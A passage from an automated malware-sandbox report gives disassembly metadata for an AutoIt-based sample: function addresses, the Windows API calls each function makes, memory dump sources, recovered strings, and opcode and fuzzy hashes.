                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MessageSend$Window
                                                                                                      • String ID: SysMonthCal32
                                                                                                      • API String ID: 2326795674-1439706946
                                                                                                      • Opcode ID: 0bb1da940f793b8d6f2880559d52029a0f0868214b5f2ad48aee0c5d0a9d4767
                                                                                                      • Instruction ID: 692951d2832619d5aab40a10712333029832cea237c86126280f95a0e3eef9d2
                                                                                                      • Opcode Fuzzy Hash: 0bb1da940f793b8d6f2880559d52029a0f0868214b5f2ad48aee0c5d0a9d4767
                                                                                                      • Instruction Fuzzy Hash: 1D21B132500218AFDF158FA0DC42FEA3B79EF89714F140114FA15AB1D0D6B5A8519BB0
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00DA5064
                                                                                                      • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00DA5072
                                                                                                      • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00DA5079
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MessageSend$DestroyWindow
                                                                                                      • String ID: msctls_updown32
                                                                                                      • API String ID: 4014797782-2298589950
                                                                                                      • Opcode ID: 3e6dff8bac2f5515a23e8410bc8265b569d9a442ac11cfc69618d68546abd9d1
                                                                                                      • Instruction ID: da6d3f4f20e5ce7bf212b5eb9dbb0e0ed43a9c0305b17bcab7aff918cdffd092
                                                                                                      • Opcode Fuzzy Hash: 3e6dff8bac2f5515a23e8410bc8265b569d9a442ac11cfc69618d68546abd9d1
                                                                                                      • Instruction Fuzzy Hash: F8214AB5600609AFDB11DF64EC81DBB37ADEF5A3A4B040459F9019B3A1CB71EC518BB0
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _wcslen
                                                                                                      • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                                                      • API String ID: 176396367-2734436370
                                                                                                      • Opcode ID: 393ff62e112477485f5e01df246fda0c408fab78dcfff3cf08c67a856f4d43f4
                                                                                                      • Instruction ID: 31320e9b995635f08abc99440fc327fa3c492be6ae31db2b870225d4ddbb5cf7
                                                                                                      • Opcode Fuzzy Hash: 393ff62e112477485f5e01df246fda0c408fab78dcfff3cf08c67a856f4d43f4
                                                                                                      • Instruction Fuzzy Hash: EA2138332422116AD320E6349C22FE7F3D9DF96310F18802AF98D96485FB619D85C3F1
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00DA419F
                                                                                                      • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00DA41AF
                                                                                                      • MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00DA41D5
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MessageSend$MoveWindow
                                                                                                      • String ID: Listbox
                                                                                                      • API String ID: 3315199576-2633736733
                                                                                                      • Opcode ID: 5af28f49a40dab8874cb4cc35bbea8a43fee77d89b8d56f87807fa092c351b71
                                                                                                      • Instruction ID: 6af34a9f1ff3e40b755da470514d303a59b15dbef10f74fdc294dbfb2bf8d149
                                                                                                      • Opcode Fuzzy Hash: 5af28f49a40dab8874cb4cc35bbea8a43fee77d89b8d56f87807fa092c351b71
                                                                                                      • Instruction Fuzzy Hash: 79219272610218BBEF118F54DC85EFB376EEFDA754F148114F9159B190CAB19C9287B0
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • SetErrorMode.KERNEL32(00000001), ref: 00D85362
                                                                                                      • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00D853B6
                                                                                                      • SetErrorMode.KERNEL32(00000000,?,?,00DADCD0), ref: 00D8542A
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorMode$InformationVolume
                                                                                                      • String ID: %lu
                                                                                                      • API String ID: 2507767853-685833217
                                                                                                      • Opcode ID: 281a0991842929f3291968bdafad141943d3ceb97360ccdadd56069691dc1558
                                                                                                      • Instruction ID: 78ff5aaec0ed64e2f9622d1f16ae66427b070f7d82eca39fde46b1dc3ac9d92c
                                                                                                      • Opcode Fuzzy Hash: 281a0991842929f3291968bdafad141943d3ceb97360ccdadd56069691dc1558
                                                                                                      • Instruction Fuzzy Hash: 17314F70A00208AFDB10EF54D985EAA7BB9EF09308F1480A5F905DB362DB71ED45CB71
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00DA4BAE
                                                                                                      • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00DA4BC3
                                                                                                      • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00DA4BD0
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MessageSend
                                                                                                      • String ID: msctls_trackbar32
                                                                                                      • API String ID: 3850602802-1010561917
                                                                                                      • Opcode ID: 5d337164c4b130e299c0d09b12023a9d576bb4686ba8baef597c1fa9fe85e9b4
                                                                                                      • Instruction ID: 5032667267099ae3bd72adeee68474ec245144aee8075abbd364e7f71be305b5
                                                                                                      • Opcode Fuzzy Hash: 5d337164c4b130e299c0d09b12023a9d576bb4686ba8baef597c1fa9fe85e9b4
                                                                                                      • Instruction Fuzzy Hash: 35112031240208BEEF215E68CC46FAB3BA8EFC6B24F010524FA51E20A0D6B1D8219B30
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                        • Part of subcall function 00D184B7: _wcslen.LIBCMT ref: 00D184CA
                                                                                                        • Part of subcall function 00D73637: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00D73655
                                                                                                        • Part of subcall function 00D73637: GetWindowThreadProcessId.USER32(?,00000000), ref: 00D73666
                                                                                                        • Part of subcall function 00D73637: GetCurrentThreadId.KERNEL32 ref: 00D7366D
                                                                                                        • Part of subcall function 00D73637: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00D73674
                                                                                                      • GetFocus.USER32 ref: 00D73807
                                                                                                        • Part of subcall function 00D7367E: GetParent.USER32(00000000), ref: 00D73689
                                                                                                      • GetClassNameW.USER32(?,?,00000100), ref: 00D73852
                                                                                                      • EnumChildWindows.USER32(?,00D738CA), ref: 00D7387A
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
                                                                                                      • String ID: %s%d
                                                                                                      • API String ID: 1272988791-1110647743
                                                                                                      • Opcode ID: 777af716eb31afc30df4c2a7ff7269d0a93c102eaf230133a640a0a21b2ebeaf
                                                                                                      • Instruction ID: f1785057fc605511fca80a60e18676fe676693992095373000cc452634b8f722
                                                                                                      • Opcode Fuzzy Hash: 777af716eb31afc30df4c2a7ff7269d0a93c102eaf230133a640a0a21b2ebeaf
                                                                                                      • Instruction Fuzzy Hash: 0F11D5712002096BCF05BF749C85AED376AEF95304F088075BD0D9B292EE359949AB70
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • _wcscmp.LIBCMT ref: 10015C77
                                                                                                      • _wcscmp.LIBCMT ref: 10015C88
                                                                                                        • Part of subcall function 10011699: GetLocaleInfoEx.KERNEL32(?,20001004,?,1000F9EB,?,1000F9EB,?,20001004,?,00000002,?,00000004,?,00000000), ref: 100116A8
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1931555351.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1931530312.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1931580966.000000001001B000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1931602166.0000000010022000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1931621641.0000000010026000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_10000000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _wcscmp$InfoLocale
                                                                                                      • String ID: ACP$OCP
                                                                                                      • API String ID: 2268238039-711371036
                                                                                                      • Opcode ID: 4ad8df94773fa3bd478f968ec76bd0df69f3242db0bb37c61c33150c93e137af
                                                                                                      • Instruction ID: e7b31757f665de4fc7f4f61c86b98b65188682213156b2748ef15d4275b86b87
                                                                                                      • Opcode Fuzzy Hash: 4ad8df94773fa3bd478f968ec76bd0df69f3242db0bb37c61c33150c93e137af
                                                                                                      • Instruction Fuzzy Hash: 14012D76605716EAE710DE58DD42BDA37D8EF042E6F188415FA08DE281FB32EAC086D5
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 00DA6220
                                                                                                      • SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 00DA624D
                                                                                                      • DrawMenuBar.USER32(?), ref: 00DA625C
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Menu$InfoItem$Draw
                                                                                                      • String ID: 0
                                                                                                      • API String ID: 3227129158-4108050209
                                                                                                      • Opcode ID: db9951fc707280051e12c8f48ed97f7decca3ec87f3d58c834b76fd2f469f82a
                                                                                                      • Instruction ID: 59d66d8bf10a2a4babc248d6ef45d8abaee9c56452d94dd586e09c496bca374b
                                                                                                      • Opcode Fuzzy Hash: db9951fc707280051e12c8f48ed97f7decca3ec87f3d58c834b76fd2f469f82a
                                                                                                      • Instruction Fuzzy Hash: CF016976900218EFDB209F51DC88BAA7FB5FF46351F188099F98AD6250DB308994EF31
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 6fd6f08f86eaa1b8adf2b2c6a7a15bde218642b9c6d3efbf536bbd359adf2c5e
                                                                                                      • Instruction ID: eeecdcf4b45376085645b04e2f5a8f09cef38ce4ae6d52e304efdb14e733038e
                                                                                                      • Opcode Fuzzy Hash: 6fd6f08f86eaa1b8adf2b2c6a7a15bde218642b9c6d3efbf536bbd359adf2c5e
                                                                                                      • Instruction Fuzzy Hash: DDC16075A00216EFDB14CF94C894EAEBBB5FF48704F248598E519DB291E731EE41CBA0
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: __alldvrm$_strrchr
                                                                                                      • String ID:
                                                                                                      • API String ID: 1036877536-0
                                                                                                      • Opcode ID: 173a905e0583d248f4586312a6838000a577cfe73f6efb9ac5c35750ff0a0cfb
                                                                                                      • Instruction ID: da49ce2b16237b62bc582cc6c99c43873476c35ce11465c7a6c9b3960162445d
                                                                                                      • Opcode Fuzzy Hash: 173a905e0583d248f4586312a6838000a577cfe73f6efb9ac5c35750ff0a0cfb
                                                                                                      • Instruction Fuzzy Hash: C5A16B72A007869FEB21CF68C891BBEBBE4EF55310F1C416DE9899B281C6749D81C770
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Variant$ClearInitInitializeUninitialize
                                                                                                      • String ID:
                                                                                                      • API String ID: 1998397398-0
                                                                                                      • Opcode ID: a9e87c1c90cb27c408b22a80935e9d1e096a924ded69204e491c06de2fda583b
                                                                                                      • Instruction ID: 888c65aa7c4181eb74ab4afa53349cebd8a12a9671faee8b09164b6fce1b4b86
                                                                                                      • Opcode Fuzzy Hash: a9e87c1c90cb27c408b22a80935e9d1e096a924ded69204e491c06de2fda583b
                                                                                                      • Instruction Fuzzy Hash: B0A14A796047109FCB00EF24D485A6ABBE5FF88754F048559F98A9B362CB31ED41CBB2
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00DB0BD4,?), ref: 00D70E80
                                                                                                      • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00DB0BD4,?), ref: 00D70E98
                                                                                                      • CLSIDFromProgID.OLE32(?,?,00000000,00DADCE0,000000FF,?,00000000,00000800,00000000,?,00DB0BD4,?), ref: 00D70EBD
                                                                                                      • _memcmp.LIBVCRUNTIME ref: 00D70EDE
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FromProg$FreeTask_memcmp
                                                                                                      • String ID:
                                                                                                      • API String ID: 314563124-0
                                                                                                      • Opcode ID: b48b459bfd634fa43d0d643f6d076f48f6c7465cb4b7744201556dbd1d2f999a
                                                                                                      • Instruction ID: c6a1124c4e72e1f4275f72d7c2ccfee25f3df31562da8a8605179a4004ce06be
                                                                                                      • Opcode Fuzzy Hash: b48b459bfd634fa43d0d643f6d076f48f6c7465cb4b7744201556dbd1d2f999a
                                                                                                      • Instruction Fuzzy Hash: 4F811B71A00209EFCB04DF94C984EEEBBB9FF89315F248559F506AB250DB71AE45CB60
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _free
                                                                                                      • String ID:
                                                                                                      • API String ID: 269201875-0
                                                                                                      • Opcode ID: 4e750d994ef1cc4a869b3d75bbf75f9b6747b15642c88e9af293d139f1448086
                                                                                                      • Instruction ID: 45388d0542e11cc0bc8498c1395cb8478988f50ccdaf1d04bc11ca67fa8548cb
                                                                                                      • Opcode Fuzzy Hash: 4e750d994ef1cc4a869b3d75bbf75f9b6747b15642c88e9af293d139f1448086
                                                                                                      • Instruction Fuzzy Hash: 6B414839A00114BBDF316BBD9C42BAE7EA5EF09371F180325FC28D62A1D6748C4987B1
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1931555351.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1931530312.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1931580966.000000001001B000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1931602166.0000000010022000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1931621641.0000000010026000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_10000000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AdjustPointer_memmove
                                                                                                      • String ID:
                                                                                                      • API String ID: 1721217611-0
                                                                                                      • Opcode ID: 8c69a6d156533a8bcfc191dbd487bb7167c3df212d3576204b33d51b16a5cc21
                                                                                                      • Instruction ID: d3ba5214732539e5225d3c033591589b804b3a817a7b14ac6b17115566c4e958
                                                                                                      • Opcode Fuzzy Hash: 8c69a6d156533a8bcfc191dbd487bb7167c3df212d3576204b33d51b16a5cc21
                                                                                                      • Instruction Fuzzy Hash: 784181395042069EFB64CE24E851B7A77E4EF01AE0F21402EF8419A9E5DF71F981E650
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • socket.WSOCK32(00000002,00000002,00000011), ref: 00D9245A
                                                                                                      • WSAGetLastError.WSOCK32 ref: 00D92468
                                                                                                      • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00D924E7
                                                                                                      • WSAGetLastError.WSOCK32 ref: 00D924F1
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorLast$socket
                                                                                                      • String ID:
                                                                                                      • API String ID: 1881357543-0
                                                                                                      • Opcode ID: f7efd582f0ae1b1b0ce1d134e8b426bd90422bdf6ac9c76945db3515f3951f9a
                                                                                                      • Instruction ID: 1cb1fb8a5efb8b606996854bb7892ca94fb86beaecacd9e1359ba6095cd749a9
                                                                                                      • Opcode Fuzzy Hash: f7efd582f0ae1b1b0ce1d134e8b426bd90422bdf6ac9c76945db3515f3951f9a
                                                                                                      • Instruction Fuzzy Hash: 6541B378600200BFE720AF24D896F6977A5EF14718F54C448F91A9F2D2CA72ED818BB1
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • GetWindowRect.USER32(00000000,?), ref: 00DA6C41
                                                                                                      • ScreenToClient.USER32(?,?), ref: 00DA6C74
                                                                                                      • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 00DA6CE1
                                                                                                      Memory Dump Source
